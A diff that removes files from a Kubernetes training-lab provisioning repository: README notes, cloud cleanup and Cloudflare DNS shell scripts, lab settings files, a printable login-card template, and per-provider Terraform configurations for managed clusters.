│ ├── 📁aws
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁azure
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁civo
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ ├── 📁digitalocean
│ │ ├── 📄config.tf
│ │ └── 📄variables.tf
│ └── ...
├── 📁tags
│ │ (contains Terraform configurations + other files
│ │ for a specific set of VMs or K8S clusters; these
│ │ are created by labctl)
│ ├── 📁2023-03-27-10-04-79-jp
│ ├── 📁2023-03-27-10-07-41-jp
│ ├── 📁2023-03-27-10-16-418-jp
│ └── ...
└── 📁virtual-machines
│ (contains Terraform configurations that can spawn
│ a bunch of virtual machines on a given provider)
├── 📁🌍aws
├── 📁🌍azure
├── 📄common.tf
├── 📁🌍digitalocean
└── ...
```
The directory structure can feel a bit overwhelming at first, but it's built with specific goals in mind.
**Consistent input/output between providers.** The per-provider configurations in `one-kubernetes` all take the same input variables, and provide the same output variables. Same thing for the per-provider configurations in `virtual-machines`.
**Don't repeat yourself.** As much as possible, common variables, definitions, and logic have been factored into the `common.tf` file that you can see in `one-kubernetes` and `virtual-machines`. That file is then symlinked into each provider-specific directory, to make sure that all providers use the same version of the `common.tf` file.
**Don't repeat yourself (again).** The things that are specific to each provider have been placed in the `providers` directory, and are shared between the `one-kubernetes` and the `virtual-machines` configurations. Specifically, for each provider, there is `config.tf` (which contains provider configuration, e.g. how to obtain the credentials for that provider) and `variables.tf` (which contains default values like which location and which VM size to use).
**Terraform configurations should work in `labctl` or standalone, without extra work.** The Terraform configurations (identified by 🌍 in the directory tree above) can be used directly. Just go to one of these directories, `terraform init`, `terraform apply`, and you're good to go. But they can also be used from `labctl`. `labctl` shouldn't barf out if you did a `terraform apply` in one of these directories (because it will only copy the `*.tf` files, and leave alone the other files, like the Terraform state).
The latter means that it should be easy to tweak these configurations, or create a new one, without having to use `labctl` to test it. It also means that if you want to use these configurations but don't care about `labctl`, you absolutely can, as in the sketch below!
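As a sketch, standalone use could look like this, using the variables defined in the `common.tf` shown further down (the provider directory and the values are just examples):
```bash
cd terraform/one-kubernetes/digitalocean
terraform init
terraform apply \
  -var cluster_name=standalone-demo \
  -var node_size=M \
  -var min_nodes_per_pool=2 \
  -var max_nodes_per_pool=4
```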
## Miscellaneous info
### Making sure Python3 is the default (Mac only)
Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.
1) Verify that Python 3 is installed.
```
ls -la /usr/local/Cellar/Python
```
You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.
2) Verify that `python` points to Python 3.
```
ls -la /usr/local/bin/python
```
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```
### AWS specific notes
These instructions assume that you're using a root account. If you'd like to use an IAM user instead, it will need the right permissions. For `pssh` mode, that includes at least `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
In `pssh` mode, the Terraform configuration currently uses the default VPC and Security Group. If you want to use another one, you'll have to make changes to `terraform/virtual-machines/aws`.
The default VPC Security Group does not open any ports to the Internet by default. So you'll need to add inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, for instance as shown below.
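For instance, with the AWS CLI (the security group ID below is a placeholder; look yours up with `aws ec2 describe-security-groups`):
```bash
SG_ID=sg-0123456789abcdef0
# SSH access for the students.
aws ec2 authorize-security-group-ingress \
  --group-id $SG_ID --protocol tcp --port 22 --cidr 0.0.0.0/0
# Web SSH and other lab services on ports 8000-8002.
aws ec2 authorize-security-group-ingress \
  --group-id $SG_ID --protocol tcp --port 8000-8002 --cidr 0.0.0.0/0
```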

===== next file =====

@@ -1,33 +0,0 @@
#!/bin/sh
case "$1-$2" in
linode-lb)
linode-cli nodebalancers list --json |
jq '.[] | select(.label | startswith("ccm-")) | .id' |
xargs -n1 -P10 linode-cli nodebalancers delete
;;
linode-pvc)
linode-cli volumes list --json |
jq '.[] | select(.label | startswith("pvc")) | .id' |
xargs -n1 -P10 linode-cli volumes delete
;;
digitalocean-lb)
doctl compute load-balancer list --output json |
jq .[].id |
xargs -n1 -P10 doctl compute load-balancer delete --force
;;
digitalocean-pvc)
doctl compute volume list --output json |
jq '.[] | select(.name | startswith("pvc-")) | .id' |
xargs -n1 -P10 doctl compute volume delete --force
;;
scaleway-pvc)
scw instance volume list --output json |
jq '.[] | select(.name | contains("_pvc-")) | .id' |
xargs -n1 -P10 scw instance volume delete
;;
*)
echo "Unknown combination of provider ('$1') and resource ('$2')."
;;
esac

===== next file =====

@@ -1,59 +0,0 @@
#!/bin/sh
#set -eu
if ! command -v http >/dev/null; then
echo "Could not find the 'http' command line tool."
echo "Please install it (the package name might be 'httpie')."
exit 1
fi
. ~/creds/creds.cloudflare.dns
cloudflare() {
case "$1" in
GET|POST|DELETE)
METHOD="$1"
shift
;;
*)
METHOD=""
;;
esac
URI=$1
shift
http --ignore-stdin $METHOD https://api.cloudflare.com/client/v4/$URI "$@" "Authorization:Bearer $CLOUDFLARE_TOKEN"
}
_list_zones() {
cloudflare zones?per_page=100 | jq -r .result[].name
}
_get_zone_id() {
cloudflare zones?name=$1 | jq -r .result[0].id
}
_populate_zone() {
ZONE_ID=$(_get_zone_id $1)
shift
for IPADDR in $*; do
cloudflare zones/$ZONE_ID/dns_records "name=*" "type=A" "content=$IPADDR"
cloudflare zones/$ZONE_ID/dns_records "name=\@" "type=A" "content=$IPADDR"
done
}
_clear_zone() {
ZONE_ID=$(_get_zone_id $1)
for RECORD_ID in $(
cloudflare zones/$ZONE_ID/dns_records | jq -r .result[].id
); do
cloudflare DELETE zones/$ZONE_ID/dns_records/$RECORD_ID
done
}
_add_zone() {
cloudflare zones "name=$1"
}
echo "This script is still work in progress."
echo "You can source it and then use its individual functions."

===== next file =====

@@ -1,43 +0,0 @@
#!/bin/sh
#
# Baseline resource usage per vcluster in our use case:
# 500 MB RAM
# 10% CPU
# (See https://docs.google.com/document/d/1n0lwp6rQKQUIuo_A5LQ1dgCzrmjkDjmDtNj1Jn92UrI)
# PRO2-XS = 4 core, 16 gb
PROVIDER=scaleway
case "$PROVIDER" in
linode)
export TF_VAR_node_size=g6-standard-6
export TF_VAR_location=eu-west
;;
scaleway)
export TF_VAR_node_size=PRO2-XS
export TF_VAR_location=fr-par-2
;;
esac
./labctl create --mode mk8s --settings settings/konk.env --provider $PROVIDER --tag konk
# set kubeconfig file
export KUBECONFIG=~/kubeconfig
cp tags/konk/stage2/kubeconfig.101 $KUBECONFIG
# set external_ip labels
kubectl get nodes -o=jsonpath='{range .items[*]}{.metadata.name} {.status.addresses[?(@.type=="ExternalIP")].address}{"\n"}{end}' |
while read node address; do
kubectl label node $node external_ip=$address
done
# vcluster all the things
./labctl create --settings settings/mk8s.env --provider vcluster --mode mk8s --students 50
# install prometheus stack because that's cool
helm upgrade --install --repo https://prometheus-community.github.io/helm-charts \
--namespace prom-system --create-namespace \
kube-prometheus-stack kube-prometheus-stack
# and also fix sysctl
kubectl apply -f ../k8s/sysctl.yaml --namespace kube-system

===== next file =====

@@ -1,7 +0,0 @@
version = 2
[plugins."io.containerd.grpc.v1.cri".containerd]
default_runtime_name = "runc"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
runtime_type = "io.containerd.runc.v2"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options]
SystemdCgroup = true

===== next file =====

@@ -1,16 +0,0 @@
#!/bin/sh
DOMAINS=domains.txt
IPS=ips.txt
. ./dns-cloudflare.sh
paste "$DOMAINS" "$IPS" | while read domain ips; do
if ! [ "$domain" ]; then
echo "⚠️ No more domains!"
exit 1
fi
_clear_zone "$domain"
_populate_zone "$domain" $ips
done
echo "✅ All done."

===== next file =====

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=kubenet
CLUSTERNUMBER=100
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

===== next file =====

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=kuberouter
CLUSTERNUMBER=200
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

===== next file =====

@@ -1,26 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=monokube
# We're sticking to this in the first DMUC lab,
# because it still works with Docker, and doesn't
# require a ServiceAccount signing key.
KUBEVERSION=1.19.11
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
disabledocker
createuser
webssh
tailhist
kubebins
kubetools
ips
"

===== next file =====

@@ -1,25 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=oldversion
USER_LOGIN=k8s
USER_PASSWORD=training
# For a list of old versions, check:
# https://kubernetes.io/releases/patch-releases/#non-active-branch-history
KUBEVERSION=1.28.9
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

===== next file =====

@@ -1,20 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=polykube
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
kubepkgs
kubebins
createuser
webssh
tailhist
kubetools
ips
"

===== next file =====

@@ -1,21 +0,0 @@
CLUSTERSIZE=3
CLUSTERPREFIX=test
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

===== next file =====

@@ -1,19 +0,0 @@
CLUSTERSIZE=1
CLUSTERPREFIX=moby
USER_LOGIN=docker
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
cards
ips
"

===== next file =====

@@ -1,6 +0,0 @@
CLUSTERSIZE=5
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="stage2"

===== next file =====

@@ -1,21 +0,0 @@
CLUSTERSIZE=4
CLUSTERPREFIX=node
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

===== next file =====

@@ -1,22 +0,0 @@
CLUSTERSIZE=10
export TF_VAR_node_size=GP1.M
CLUSTERPREFIX=node
USER_LOGIN=k8s
USER_PASSWORD=training
STEPS="
wait
standardize
clusterize
tools
docker
createuser
webssh
tailhist
kubepkgs
kubeadm
kubetools
kubetest
"

===== next file =====

@@ -1,4 +0,0 @@
USER_LOGIN=k8s
USER_PASSWORD=
STEPS="stage2"

===== next file =====

@@ -1,21 +0,0 @@
#export TF_VAR_node_size=GP2.4
#export TF_VAR_node_size=g6-standard-6
#export TF_VAR_node_size=m7i.xlarge
CLUSTERSIZE=1
CLUSTERPREFIX=CHANGEME
USER_LOGIN=portal
USER_PASSWORD=CHANGEME
STEPS="
wait
standardize
clusterize
tools
docker
createuser
ips
"

===== next file =====

@@ -1,40 +0,0 @@
#!/bin/sh
set -e
PREFIX=$(date +%Y-%m-%d-%H-%M)
PROVIDER=openstack/enix # aws also works
STUDENTS=2
#export TF_VAR_location=eu-north-1
export TF_VAR_node_size=S
SETTINGS=admin-monokube
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-polykube
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-oldversion
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS
SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./labctl create \
--tag $TAG \
--provider $PROVIDER \
--settings settings/$SETTINGS.env \
--students $STUDENTS

===== next file =====

@@ -1 +0,0 @@
terraform/tags

===== next file =====

@@ -1,237 +0,0 @@
{#
The variables below can be customized here directly, or in your
settings.yaml file. Any variable in settings.yaml will be exposed
in here as well.
#}
{%- set url = url
| default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
| default(10) -%}
{%- set lang = lang
| default("en") -%}
{%- set event = event
| default("training session") -%}
{%- set backside = backside
| default(False) -%}
{%- set image = image
| default(False) -%}
{%- set clusternumber = clusternumber
| default(None) -%}
{%- set thing = thing
| default("lab environment") -%}
{%- if lang == "en" -%}
{%- set intro -%}
Here is the connection information to your very own
{{ thing }} for this {{ event }}.
You can connect to it with any SSH client.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
{{ thing }} pour cette formation.
Vous pouvez vous y connecter
avec n'importe quel client SSH.
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
{% if paper_size == "A4" %}
@page {
size: A4; /* Change from the default size of A4 */
margin: 0.5cm; /* Set margin on each page */
}
body {
/* this is A4 minus 0.5cm margins */
width: 20cm;
height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
size: Letter; /* 8.5in x 11in */
}
body {
width: 6.75in; /* two cards wide */
margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
margin-top: 0; /* NOTE: we have to manually specify a top margin of e.g. 0.1875in when printing */
}
{% endif %}
body, table {
line-height: 1em;
font-size: 15px;
font-family: 'Slabo 27px';
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
td:first-child {
width: 10.5em;
}
div.card {
float: left;
border: 0.01in dotted black;
/*
columns * (width+left+right) < 100%
height: 33%;
width: 24.8%;
width: 33%;
*/
width: 3.355in; /* 3.375in minus two 0.01in borders */
height: 2.105in; /* 2.125in minus two 0.01in borders */
}
p {
margin: 0.8em;
}
div.front {
{% if image %}
background-image: url("{{ image }}");
background-repeat: no-repeat;
background-size: 1in;
background-position-x: 2.8in;
background-position-y: center;
{% endif %}
}
span.scale {
white-space: nowrap;
}
.qrcode img {
height: 5.8em;
padding: 1em 1em 0.5em 1em;
float: left;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 0;
}
</style>
<script type="text/javascript" src="qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
[].forEach.call(
document.getElementsByClassName("qrcode"),
(e, index) => {
new QRCode(e, {
text: "{{ qrcode }}",
correctLevel: QRCode.CorrectLevel.L
});
}
);
}
function scale() {
[].forEach.call(
document.getElementsByClassName("scale"),
(e, index) => {
var text_width = e.getBoundingClientRect().width;
var box_width = e.parentElement.getBoundingClientRect().width;
var percent = 100 * box_width / text_width + "%";
e.style.fontSize = percent;
}
);
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for login in logins %}
<div class="card front">
<p>{{ intro }}</p>
<p>
<table>
<tr>
<td>login:</td>
<td>password:</td>
</tr>
<tr>
<td class="logpass">{{ login.login }}</td>
<td class="logpass">{{ login.password }}</td>
</tr>
<tr>
<td>IP address:</td>
{% if login.port %}
<td>port:</td>
{% endif %}
</tr>
<tr>
<td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
{% if login.port %}
<td class="logpass">{{ login.port }}</td>
{% endif %}
</tr>
</table>
</p>
<p>
{% if url %}
{{ slides_are_at }}
<p>
<span class="scale">{{ url }}</span>
</p>
{% endif %}
</p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="card back">
{{ backside }}
{#
<p>Thanks for attending
"Getting Started With Kubernetes and Container Orchestration"
during CONFERENCE in Month YYYY!</p>
<p>If you liked that workshop,
I can train your team, in person or
online, with custom courses of
any length and any level.
</p>
{% if qrcode %}
<p>If you're interested, please scan that QR code to contact me:</p>
<span class="qrcode"></span>
{% else %}
<p>If you're interested, you can contact me at:</p>
{% endif %}
<p>jerome.petazzoni@gmail.com</p>
#}
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>

===== next file =====

@@ -1,18 +0,0 @@
cards_template: cards.html
paper_size: Letter
url: https://2024-11-qconsf.container.training
event: workshop
backside: |
<div class="qrcode"></div>
<p>
Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
</p>
<p>
If you'd like me to send you a copy of the recording of the workshop
and of the training materials,
please scan that QR code to leave me your
contact information. Thank you!
</p>
qrcode: https://2024-11-qconsf.container.training/q
thing: Kubernetes cluster
image: logo-bento.svg

===== next file =====

@@ -1,4 +0,0 @@
#!/bin/sh
az account list-locations -o table \
--query "sort_by([?metadata.regionType == 'Physical'], &regionalDisplayName)[]
.{ displayName: displayName, regionalDisplayName: regionalDisplayName }"

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
civo region ls

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
doctl compute region list

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
exo zone

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
gcloud compute zones list

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
linode-cli regions list

===== next file =====

@@ -1,2 +0,0 @@
#!/bin/sh
oci iam region list

===== next file =====

@@ -1,6 +0,0 @@
#!/bin/sh
echo "# Note that this is hard-coded in $0.
# I don't know if there is a way to list regions through the Scaleway API.
fr-par
nl-ams
pl-waw"

===== next file =====

@@ -1 +0,0 @@
one-kubernetes-config/config.tf

===== next file =====

@@ -1,3 +0,0 @@
This directory should contain a config.tf file, even if it's empty.
(Because if the file doesn't exist, then the Terraform configuration
in the parent directory will fail.)

===== next file =====

@@ -1,8 +0,0 @@
This directory should contain a copy of one of the "one-kubernetes" modules.
For instance, when located in this directory, you can do:
cp ../../one-kubernetes/linode/* .
Then, move the config.tf file to ../one-kubernetes-config:
mv config.tf ../one-kubernetes-config

===== next file =====

@@ -1 +0,0 @@
one-kubernetes-module/provider.tf

===== next file =====

@@ -1,3 +0,0 @@
terraform {
required_version = ">= 1.4"
}

===== next file =====

@@ -1,33 +0,0 @@
variable "tag" {
type = string
}
variable "how_many_clusters" {
type = number
default = 2
}
variable "min_nodes_per_cluster" {
type = number
default = 2
}
variable "max_nodes_per_cluster" {
type = number
default = 4
}
variable "node_size" {
type = string
default = "M"
}
variable "location" {
type = string
default = null
}
# TODO: perhaps handle if it's space-separated instead of newline?
locals {
locations = var.location == null ? [null] : split("\n", var.location)
}

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/aws/config.tf

===== next file =====

@@ -1,87 +0,0 @@
# Taken from:
# https://github.com/hashicorp/learn-terraform-provision-eks-cluster/blob/main/main.tf
data "aws_availability_zones" "available" {}
module "vpc" {
source = "terraform-aws-modules/vpc/aws"
version = "3.19.0"
name = var.cluster_name
cidr = "10.0.0.0/16"
azs = slice(data.aws_availability_zones.available.names, 0, 3)
private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"]
public_subnets = ["10.0.4.0/24", "10.0.5.0/24", "10.0.6.0/24"]
enable_nat_gateway = true
single_nat_gateway = true
enable_dns_hostnames = true
public_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/elb" = 1
}
private_subnet_tags = {
"kubernetes.io/cluster/${var.cluster_name}" = "shared"
"kubernetes.io/role/internal-elb" = 1
}
}
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "19.5.1"
cluster_name = var.cluster_name
cluster_version = "1.24"
vpc_id = module.vpc.vpc_id
subnet_ids = module.vpc.private_subnets
cluster_endpoint_public_access = true
eks_managed_node_group_defaults = {
ami_type = "AL2_x86_64"
}
eks_managed_node_groups = {
one = {
name = "node-group-one"
instance_types = [local.node_size]
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
desired_size = var.min_nodes_per_pool
}
}
}
# https://aws.amazon.com/blogs/containers/amazon-ebs-csi-driver-is-now-generally-available-in-amazon-eks-add-ons/
data "aws_iam_policy" "ebs_csi_policy" {
arn = "arn:aws:iam::aws:policy/service-role/AmazonEBSCSIDriverPolicy"
}
module "irsa-ebs-csi" {
source = "terraform-aws-modules/iam/aws//modules/iam-assumable-role-with-oidc"
version = "4.7.0"
create_role = true
role_name = "AmazonEKSTFEBSCSIRole-${module.eks.cluster_name}"
provider_url = module.eks.oidc_provider
role_policy_arns = [data.aws_iam_policy.ebs_csi_policy.arn]
oidc_fully_qualified_subjects = ["system:serviceaccount:kube-system:ebs-csi-controller-sa"]
}
resource "aws_eks_addon" "ebs-csi" {
cluster_name = module.eks.cluster_name
addon_name = "aws-ebs-csi-driver"
addon_version = "v1.5.2-eksbuild.1"
service_account_role_arn = module.irsa-ebs-csi.iam_role_arn
tags = {
"eks_addon" = "ebs-csi"
"terraform" = "true"
}
}

===== next file =====

@@ -1,44 +0,0 @@
output "cluster_id" {
value = module.eks.cluster_arn
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = yamlencode({
apiVersion = "v1"
kind = "Config"
clusters = [{
name = var.cluster_name
cluster = {
certificate-authority-data = module.eks.cluster_certificate_authority_data
server = module.eks.cluster_endpoint
}
}]
contexts = [{
name = var.cluster_name
context = {
cluster = var.cluster_name
user = var.cluster_name
}
}]
users = [{
name = var.cluster_name
user = {
exec = {
apiVersion = "client.authentication.k8s.io/v1beta1"
command = "aws"
args = ["eks", "get-token", "--cluster-name", var.cluster_name]
}
}
}]
current-context = var.cluster_name
})
}
data "aws_eks_cluster_auth" "_" {
name = module.eks.cluster_name
}

===== next file =====

@@ -1,8 +0,0 @@
terraform {
required_providers {
aws = {
source = "hashicorp/aws"
version = "~> 4.47.0"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/aws/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/azure/config.tf

===== next file =====

@@ -1,22 +0,0 @@
resource "azurerm_resource_group" "_" {
name = var.cluster_name
location = var.location
}
resource "azurerm_kubernetes_cluster" "_" {
name = var.cluster_name
location = var.location
dns_prefix = var.cluster_name
identity {
type = "SystemAssigned"
}
resource_group_name = azurerm_resource_group._.name
default_node_pool {
name = "x86"
node_count = var.min_nodes_per_pool
min_count = var.min_nodes_per_pool
max_count = var.max_nodes_per_pool
vm_size = local.node_size
enable_auto_scaling = true
}
}

===== next file =====

@@ -1,12 +0,0 @@
output "cluster_id" {
value = azurerm_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = azurerm_kubernetes_cluster._.kube_config_raw
sensitive = true
}

===== next file =====

@@ -1,7 +0,0 @@
terraform {
required_providers {
azurerm = {
source = "hashicorp/azurerm"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/azure/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/civo/config.tf

===== next file =====

@@ -1,17 +0,0 @@
# As of March 2023, the default type ("k3s") only supports up
# to Kubernetes 1.23, which belongs to a museum.
# So let's use Talos, which supports up to 1.25.
resource "civo_kubernetes_cluster" "_" {
name = var.cluster_name
firewall_id = civo_firewall._.id
cluster_type = "talos"
pools {
size = local.node_size
node_count = var.min_nodes_per_pool
}
}
resource "civo_firewall" "_" {
name = var.cluster_name
}

===== next file =====

@@ -1,12 +0,0 @@
output "cluster_id" {
value = civo_kubernetes_cluster._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
value = civo_kubernetes_cluster._.kubeconfig
sensitive = true
}

===== next file =====

@@ -1,7 +0,0 @@
terraform {
required_providers {
civo = {
source = "civo/civo"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/civo/variables.tf

===== next file =====

@@ -1,28 +0,0 @@
variable "cluster_name" {
type = string
default = "deployed-with-terraform"
}
variable "common_tags" {
type = list(string)
default = []
}
variable "node_size" {
type = string
default = "M"
}
variable "min_nodes_per_pool" {
type = number
default = 2
}
variable "max_nodes_per_pool" {
type = number
default = 4
}
locals {
node_size = lookup(var.node_sizes, var.node_size, var.node_size)
}

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/digitalocean/config.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/digitalocean/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/exoscale/config.tf

===== next file =====

@@ -1,20 +0,0 @@
resource "exoscale_sks_cluster" "_" {
zone = var.location
name = var.cluster_name
service_level = "starter"
}
resource "exoscale_sks_nodepool" "_" {
cluster_id = exoscale_sks_cluster._.id
zone = exoscale_sks_cluster._.zone
name = var.cluster_name
instance_type = local.node_size
size = var.min_nodes_per_pool
}
resource "exoscale_sks_kubeconfig" "_" {
cluster_id = exoscale_sks_cluster._.id
zone = exoscale_sks_cluster._.zone
user = "kubernetes-admin"
groups = ["system:masters"]
}

===== next file =====

@@ -1,12 +0,0 @@
output "cluster_id" {
value = exoscale_sks_cluster._.id
}
output "has_metrics_server" {
value = true
}
output "kubeconfig" {
value = exoscale_sks_kubeconfig._.kubeconfig
sensitive = true
}

===== next file =====

@@ -1,7 +0,0 @@
terraform {
required_providers {
exoscale = {
source = "exoscale/exoscale"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/exoscale/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/googlecloud/config.tf

===== next file =====

@@ -1,12 +0,0 @@
locals {
location = var.location != null ? var.location : "europe-north1-a"
region = replace(local.location, "/-[a-z]$/", "")
# Unfortunately, the following line doesn't work
# (that attribute just returns an empty string)
# so we have to hard-code the project name.
#project = data.google_client_config._.project
project = "prepare-tf"
}
data "google_client_config" "_" {}

===== next file =====

@@ -1 +0,0 @@
../../providers/googlecloud/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/linode/config.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/linode/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/oci/config.tf

===== next file =====

@@ -1,7 +0,0 @@
terraform {
required_providers {
oci = {
source = "oracle/oci"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/oci/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/ovh/config.tf

===== next file =====

@@ -1,18 +0,0 @@
resource "ovh_cloud_project_kube" "_" {
name = var.cluster_name
region = var.location
version = local.k8s_version
}
resource "ovh_cloud_project_kube_nodepool" "_" {
kube_id = ovh_cloud_project_kube._.id
name = "x86"
flavor_name = local.node_size
desired_nodes = var.min_nodes_per_pool
min_nodes = var.min_nodes_per_pool
max_nodes = var.max_nodes_per_pool
}
locals {
k8s_version = "1.26"
}

===== next file =====

@@ -1,12 +0,0 @@
output "cluster_id" {
value = ovh_cloud_project_kube._.id
}
output "has_metrics_server" {
value = false
}
output "kubeconfig" {
sensitive = true
value = ovh_cloud_project_kube._.kubeconfig
}

===== next file =====

@@ -1,7 +0,0 @@
terraform {
required_providers {
ovh = {
source = "ovh/ovh"
}
}
}

===== next file =====

@@ -1 +0,0 @@
../../providers/ovh/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

===== next file =====

@@ -1 +0,0 @@
../../providers/scaleway/config.tf

===== next file =====

@@ -1,42 +0,0 @@
resource "scaleway_vpc_private_network" "_" {
}
# This is a kind of hack to use a custom security group with Kapsule.
# See https://www.scaleway.com/en/docs/containers/kubernetes/reference-content/secure-cluster-with-private-network/
resource "scaleway_instance_security_group" "_" {
name = "kubernetes ${split("/", scaleway_k8s_cluster._.id)[1]}"
inbound_default_policy = "accept"
outbound_default_policy = "accept"
}
resource "scaleway_k8s_cluster" "_" {
name = var.cluster_name
tags = var.common_tags
version = local.k8s_version
type = "kapsule"
cni = "cilium"
delete_additional_resources = true
private_network_id = scaleway_vpc_private_network._.id
}
resource "scaleway_k8s_pool" "_" {
cluster_id = scaleway_k8s_cluster._.id
name = "x86"
tags = var.common_tags
node_type = local.node_size
size = var.min_nodes_per_pool
min_size = var.min_nodes_per_pool
max_size = var.max_nodes_per_pool
autoscaling = var.max_nodes_per_pool > var.min_nodes_per_pool
autohealing = true
depends_on = [ scaleway_instance_security_group._ ]
}
data "scaleway_k8s_version" "_" {
name = "latest"
}
locals {
k8s_version = data.scaleway_k8s_version._.name
}

===== next file =====

@@ -1,12 +0,0 @@
output "cluster_id" {
value = scaleway_k8s_cluster._.id
}
output "has_metrics_server" {
value = sort([local.k8s_version, "1.22"])[0] == "1.22"
}
output "kubeconfig" {
sensitive = true
value = scaleway_k8s_cluster._.kubeconfig.0.config_file
}

===== next file =====

@@ -1 +0,0 @@
../../providers/scaleway/variables.tf

===== next file =====

@@ -1 +0,0 @@
../common.tf

